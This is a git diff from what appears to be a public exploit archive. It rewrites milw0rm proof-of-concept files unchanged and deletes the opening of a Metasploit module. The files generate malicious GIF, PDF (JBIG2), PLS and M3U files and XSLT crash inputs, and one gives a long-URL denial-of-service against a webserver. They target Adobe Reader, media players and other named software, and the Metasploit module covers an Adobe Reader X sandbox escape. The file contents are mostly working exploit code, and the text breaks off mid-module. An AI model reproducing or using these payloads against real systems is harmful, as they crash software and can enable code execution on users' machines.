+"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". +"\x21". ## Extension Introducer 0x21 +"\x2C". ## Label 0x2C +# Data Sub-blocks (1) Size: 21+1 +#0 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#1 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC". +"\x21\xEC". +#2 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#3 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#4 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#5 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#6 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#7 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#8 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#9 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#10 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC". 
+"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC". +#11 +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". +"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E". +"\x01\x5A". +"\x00". ## Terminator +"\x21". ## Extension Introducer 0x21 +"\x2C". ## Label 0x2C +# Data Sub-blocks (2) Size: EC+1 +#0 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#1 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". 
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#2 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62". +#3 +"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". +"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". 
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
+#4
+"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
+"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
+"\x00". # Terminator
+"\x3B". # Trailer
+
+open(out, "> crash.gif");
+binmode(out);
+print (out $gif);
+close(out);
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/windows/dos/8099.pl b/platforms/windows/dos/8099.pl
index b3f20e709..c5bc66b27 100755
--- a/platforms/windows/dos/8099.pl
+++ b/platforms/windows/dos/8099.pl
@@ -1,90 +1,90 @@
-#!/usr/bin/perl
-# k`sOSe 02/22/2009
-
-# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
-
-my $size = "\x40\x00";
-my $factor = "ABCD";
-my $data = "A" x 8314;
-
-
-print pdf();
-
-sub pdf()
-{
-
-"%PDF-1.5\n" .
-"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
-"3 0 \n" .
-"xref\n" .
-"3 16\n" .
-"0000000023 00000 n \n" .
-"0000000584 00000 n \n" .
-"0000000865 00000 n \n" .
-"0000001035 00000 n \n" .
-"0000001158 00000 n \n" .
-"0000001287 00000 n \n" .
-"0000001338 00000 n \n" .
-"0000001384 00000 n \n" .
-"0000002861 00000 n \n" .
-"0000003637 00000 n \n" .
-"0000005126 00000 n \n" .
-"0000005173 00000 n \n" .
-"0000005317 00000 n \n" .
-"0000005370 00000 n \n" .
-"0000005504 00000 n \n" .
-"0000000714 00000 n \n" .
-"trailer\n" .
-"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
-"startxref\n" .
-"0\n" .
-"%%EOF\n" .
-" \n" .
-"4 0 obj\n" .
-"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
-"endobj\n" .
-" \n" .
-"5 0 obj\n" .
-"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
-"endobj\n" .
-"6 0 obj\n" .
-"<</Length 56/Filter/FlateDecode>>\n" .
-"stream\n" .
-"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
-"S\xb0\n" .
-"\x00J\x15#,\n" .
-"endstream\n" .
-"endobj\n" .
-
-"12 0 obj\n" .
-"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
-"stream\n" .
-"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
-"endobj\n" .
-"13 0 obj\n" .
-"<</Type/OCG/Name(Text Color)>>\n" .
-"endobj\n" .
-"14 0 obj\n" .
-"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
-"stream\n" .
-"\x00\n" .
-"endstream\n" .
-"endobj\n" .
-
-"1 0 obj\n" .
-"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
-"endobj\n" .
-"xref\n" .
-"0 3\n" .
-"0000000000 65535 f \n" .
-"0000009988 00000 n \n" .
-"0000010039 00000 n \n" .
-"trailer\n" .
-"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
-"startxref\n" .
-"104\n" .
-"%%EOF\n";
-
-}
-
-# milw0rm.com [2009-02-23]
+#!/usr/bin/perl
+# k`sOSe 02/22/2009
+
+# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
+
+my $size = "\x40\x00";
+my $factor = "ABCD";
+my $data = "A" x 8314;
+
+
+print pdf();
+
+sub pdf()
+{
+
+"%PDF-1.5\n" .
+"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
+"3 0 \n" .
+"xref\n" .
+"3 16\n" .
+"0000000023 00000 n \n" .
+"0000000584 00000 n \n" .
+"0000000865 00000 n \n" .
+"0000001035 00000 n \n" .
+"0000001158 00000 n \n" .
+"0000001287 00000 n \n" .
+"0000001338 00000 n \n" .
+"0000001384 00000 n \n" .
+"0000002861 00000 n \n" .
+"0000003637 00000 n \n" .
+"0000005126 00000 n \n" .
+"0000005173 00000 n \n" .
+"0000005317 00000 n \n" .
+"0000005370 00000 n \n" .
+"0000005504 00000 n \n" .
+"0000000714 00000 n \n" .
+"trailer\n" .
+"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
+"startxref\n" .
+"0\n" .
+"%%EOF\n" .
+" \n" .
+"4 0 obj\n" .
+"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
+"endobj\n" .
+" \n" .
+"5 0 obj\n" .
+"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
+"endobj\n" .
+"6 0 obj\n" .
+"<</Length 56/Filter/FlateDecode>>\n" .
+"stream\n" .
+"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
+"S\xb0\n" .
+"\x00J\x15#,\n" .
+"endstream\n" .
+"endobj\n" .
+
+"12 0 obj\n" .
+"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
+"stream\n" .
+"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
+"endobj\n" .
+"13 0 obj\n" .
+"<</Type/OCG/Name(Text Color)>>\n" .
+"endobj\n" .
+"14 0 obj\n" .
+"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
+"stream\n" .
+"\x00\n" .
+"endstream\n" .
+"endobj\n" .
+
+"1 0 obj\n" .
+"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
+"endobj\n" .
+"xref\n" .
+"0 3\n" .
+"0000000000 65535 f \n" .
+"0000009988 00000 n \n" .
+"0000010039 00000 n \n" .
+"trailer\n" .
+"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
+"startxref\n" .
+"104\n" .
+"%%EOF\n";
+
+}
+
+# milw0rm.com [2009-02-23]
diff --git a/platforms/windows/dos/8232.py b/platforms/windows/dos/8232.py
index c9204be69..37105694a 100755
--- a/platforms/windows/dos/8232.py
+++ b/platforms/windows/dos/8232.py
@@ -1,20 +1,20 @@
-#!/usr/bin/python
-# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
-# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
-# I have tried a lot of Addresses .
-# Waitting for the Exploit from someone .
-# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
-print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
-print " Discovered By : zAx"
-print " Contact : ThE-zAx@Hotmail.Com"
-header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
-junk = "\x41"*2024
-next_seh = "\x42"*4
-seh = "\x43"*4
-other_data = "\xCC"*800
-ex = header + junk + next_seh + seh + other_data
-file=open("zAx.pls","w")
-file.write(ex)
-file.close()
-
-# milw0rm.com [2009-03-18]
+#!/usr/bin/python
+# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
+# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
+# I have tried a lot of Addresses .
+# Waitting for the Exploit from someone .
+# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
+print " Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
+print " Discovered By : zAx"
+print " Contact : ThE-zAx@Hotmail.Com"
+header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D"
+junk = "\x41"*2024
+next_seh = "\x42"*4
+seh = "\x43"*4
+other_data = "\xCC"*800
+ex = header + junk + next_seh + seh + other_data
+file=open("zAx.pls","w")
+file.write(ex)
+file.close()
+
+# milw0rm.com [2009-03-18]
diff --git a/platforms/windows/dos/8356.txt b/platforms/windows/dos/8356.txt
index 7f50c8dd3..9da933e8f 100755
--- a/platforms/windows/dos/8356.txt
+++ b/platforms/windows/dos/8356.txt
@@ -1,43 +1,43 @@ -------------- -by DATA_SNIPER -GREETZ TO THE FOUNDER ;) -fore more information and bug analyses: -http://www.at4re.com/f/showthread.php?p=47560 -i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000] -so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit. -and the second code change the EAX to 017ED9A0. -xslt.xsl code EAX=00000031: -<?xml version="1.0" encoding="UTF-8"?> - -http://www.w3.org/1999/XSL/Transform"> - - <xsl:key name="label" match="item1" use=""/> - - <xsl:template match="root"> - <xsl:for-each select="key('label', @item1)"> - </xsl:for-each> - </xsl:template> - -</xsl:stylesheet> -xslt.xsl code EAX=017ED9A0: -<?xml version="1.0" encoding="UTF-8"?> - -http://www.w3.org/1999/XSL/Transform"> - - <xsl:key name="label" match="item1" use=""/> - - <xsl:template match="root"> - <xsl:value-of select="key('label', @item1)"> - </xsl:value-of> - </xsl:template> -</xsl:stylesheet> - -xmlcrash.xml code: - -<?xml version="1.0" encoding="UTF-8"?> -<?xml-stylesheet type="text/xsl" href="xslt.xsl"?> -http://www.w3.org/2001/XMLSchema-instance"> - <item1 id="datasniper" /> -</root> - -# milw0rm.com [2009-04-06] +------------- +by DATA_SNIPER +GREETZ TO THE FOUNDER ;) +fore more information and bug analyses: +http://www.at4re.com/f/showthread.php?p=47560 +i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000] +so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart can exploit it by changing some things in the exploit. +and the second code change the EAX to 017ED9A0. 
+xslt.xsl code EAX=00000031: +<?xml version="1.0" encoding="UTF-8"?> + +http://www.w3.org/1999/XSL/Transform"> + + <xsl:key name="label" match="item1" use=""/> + + <xsl:template match="root"> + <xsl:for-each select="key('label', @item1)"> + </xsl:for-each> + </xsl:template> + +</xsl:stylesheet> +xslt.xsl code EAX=017ED9A0: +<?xml version="1.0" encoding="UTF-8"?> + +http://www.w3.org/1999/XSL/Transform"> + + <xsl:key name="label" match="item1" use=""/> + + <xsl:template match="root"> + <xsl:value-of select="key('label', @item1)"> + </xsl:value-of> + </xsl:template> +</xsl:stylesheet> + +xmlcrash.xml code: + +<?xml version="1.0" encoding="UTF-8"?> +<?xml-stylesheet type="text/xsl" href="xslt.xsl"?> +http://www.w3.org/2001/XMLSchema-instance"> + <item1 id="datasniper" /> +</root> + +# milw0rm.com [2009-04-06] diff --git a/platforms/windows/dos/8588.pl b/platforms/windows/dos/8588.pl index 8e0e95eec..1ceedbec4 100755 --- a/platforms/windows/dos/8588.pl +++ b/platforms/windows/dos/8588.pl 
@@ -1,23 +1,23 @@
-#####################################################################################################
-# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
-# Discovered by SirGod - www.mortal-team.net
-# Error log :
-#
-# Logged at Friday, May 01, 2009 14:03:17
-# FileVersion: 1.0.0.283
-# ProductVersion: 1.0.0.0
-# Exception Code: 0xC0000005
-# Exception Addr: 0x001B:0x004317F0
-# Exception Module: TraktorBeatport.exe
-# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
-# The memory could not be "read"
-# http://www.brothersoft.com/beatport-player-download-62319.html
-######################################################################################################
-my $chars= "A" x 1337;
-my $file="sirgod.m3u";
-open(my $FILE, ">>$file") or die "Cannot open $file: $!";
-print $FILE $chars;
-close($FILE);
-print "$file was created";
-
-# milw0rm.com [2009-05-01]
+#####################################################################################################
+# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
+# Discovered by SirGod - www.mortal-team.net
+# Error log :
+#
+# Logged at Friday, May 01, 2009 14:03:17
+# FileVersion: 1.0.0.283
+# ProductVersion: 1.0.0.0
+# Exception Code: 0xC0000005
+# Exception Addr: 0x001B:0x004317F0
+# Exception Module: TraktorBeatport.exe
+# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
+# The memory could not be "read"
+# http://www.brothersoft.com/beatport-player-download-62319.html
+######################################################################################################
+my $chars= "A" x 1337;
+my $file="sirgod.m3u";
+open(my $FILE, ">>$file") or die "Cannot open $file: $!";
+print $FILE $chars;
+close($FILE);
+print "$file was created";
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/dos/9621.txt b/platforms/windows/dos/9621.txt
index 690f86f4b..ee85ffb46 100755
--- a/platforms/windows/dos/9621.txt
+++ b/platforms/windows/dos/9621.txt
@@ -1,34 +1,34 @@
-#############################################################################################
-#
-# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
-# Author : Usman Saeed
-# Company : Xc0re Security Reasearch Group
-# Date : 06/09/09
-# Homepage : http://www.xc0re.net
-#
-#############################################################################################
-
-
-[*] Download Page :
-http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
-
-
-[*] Attack type : Remote
-
-
-[*] Patch Status : Unpatched
-
-
-
-[*] Exploitation :
-
-
-
-[+] [Denial Of Service / CRASH]
-
-("A" x 200; #Late crash)
-
-Exploit:
-http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-
-# milw0rm.com [2009-09-10]
+#############################################################################################
+#
+# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
+# Author : Usman Saeed
+# Company : Xc0re Security Reasearch Group
+# Date : 06/09/09
+# Homepage : http://www.xc0re.net
+#
+#############################################################################################
+
+
+[*] Download Page :
+http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
+
+
+[*] Attack type : Remote
+
+
+[*] Patch Status : Unpatched
+
+
+
+[*] Exploitation :
+
+
+
+[+] [Denial Of Service / CRASH]
+
+("A" x 200; #Late crash)
+
+Exploit:
+http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+# milw0rm.com [2009-09-10]
diff --git a/platforms/windows/local/25776.rb b/platforms/windows/local/25776.rb
deleted file mode 100755
index cad5c3c7e..000000000
--- a/platforms/windows/local/25776.rb
+++ /dev/null
@@ -1,358 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex' -require 'msf/core/post/windows/registry' -require 'msf/core/post/common' -require 'msf/core/post/file' - -class Metasploit3 < Msf::Exploit::Local - Rank = GreatRanking - - include Msf::Exploit::EXE - include Msf::Post::Common - include Msf::Post::File - include Msf::Post::Windows::Registry - - def initialize(info={}) - super(update_info(info, { - 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass', - 'Description' => %q{ - This module exploits a vulnerability on Adobe Reader X Sandbox. The - vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe - process to write register values which can be used to trigger a buffer overflow on - the AdobeCollabSync component, allowing to achieve Medium Integrity Level - privileges from a Low Integrity AcroRd32.exe process. This module has been tested - successfully on Adobe Reader X 10.1.4 over Windows 7 SP1. 
- }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Felipe Andres Manzano', # Vulnerability discovery and PoC - 'juan vazquez' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2013-2730' ], - [ 'OSVDB', '93355' ], - [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] - ], - 'Arch' => ARCH_X86, - 'Platform' => 'win', - 'SessionTypes' => 'meterpreter', - 'Payload' => - { - 'Space' => 12288, - 'DisableNops' => true - }, - 'Targets' => - [ - [ 'Adobe Reader X 10.1.4 / Windows 7 SP1', - { - 'AdobeCollabSyncTrigger' => 0x18fa0, - 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF" - } - ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate'=> 'May 14 2013' - })) - - end - - def on_new_session - print_status("Deleting Malicious Registry Keys...") - if not 